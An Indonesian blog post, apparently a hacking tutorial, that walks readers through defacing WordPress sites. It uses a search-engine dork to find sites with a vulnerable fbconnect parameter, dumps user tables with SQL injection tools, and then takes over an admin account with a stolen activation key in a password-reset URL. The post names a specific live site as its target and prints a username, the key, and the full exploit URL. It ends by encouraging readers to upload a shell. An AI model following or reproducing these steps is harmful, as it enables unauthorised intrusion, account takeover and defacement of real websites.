Oke kembali lagi dengan saya yaitu admin paling ganteng 😆, kali ini saya akan memberikan tutorial deface Wordpress dengan sql-inject, wow wordpress bisa sql? bisa lah, apasih yang gk bisa buat kamu😋, karna kemarin banyak yang bilang deface wordpress itu susah, yaudah semoga artikel ini bermanfaat 😀, oke langsung sadja siapkan bahan-bahan kalian.- Harus ada laptop atau pc, dan juga koneksi intenet tentunya- Sqlmap,Havij,Sql Dumper ataupun bisa pake manual, suka-suka kalian aja- Dork: inurl:?fbconnect_action=myhome (kembangin lagi dengan otak lu )
Masukin dork tersebut kemesin pencari kalian, disini saya sudah punya target sendiri Target :http://www.40sale.com/?fbconnect_action=myhome&userid=14 nah pada bagian"userid=" di tambahkan fb, jadinya akan begini "fbuserid="
Nah dan jika sudah sekarang kalian tinggal cari tablek wp_user atau yang ada hubungannya sama user dan passwort, kalo udah ketemu cari columns user_login dan user_activation_key, Disini saya sedang menggunakan Havij, ini dia contohnya
Nah di atas itu saya sedang mencari username, sedangkan di bawah ini saya sedang mencari password dari target
Booom! ketemukan tuh passwordnya, nah disini sekarnag saya mau login ke site dengan
Username: pico
Activation key: GBasuGIZFtbUjpP3MvWb
dan sebelum itu gunakan exploit untuk loginnya
exploit: wp-login?action=rp&key="kode aktivasi"&login="user login"
Activation key: GBasuGIZFtbUjpP3MvWb
dan sebelum itu gunakan exploit untuk loginnya
exploit: wp-login?action=rp&key="kode aktivasi"&login="user login"
Jadi url webnya akan kaya gini : http://www.40sale.com/wp-login.php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico
Nah setelah itu, kita akan login kedalam dashboard admin. Taraaaaa!!!!😆😆😆
Setelah itu terserah deh mau di apakan sama kalian, mau uplaod shell kek, mau di pakan kek, ya suka2 kalian sadja 😁, sekian buat tutor hari ini, trimakasih happy hacking 😁
Post a Comment
Post a Comment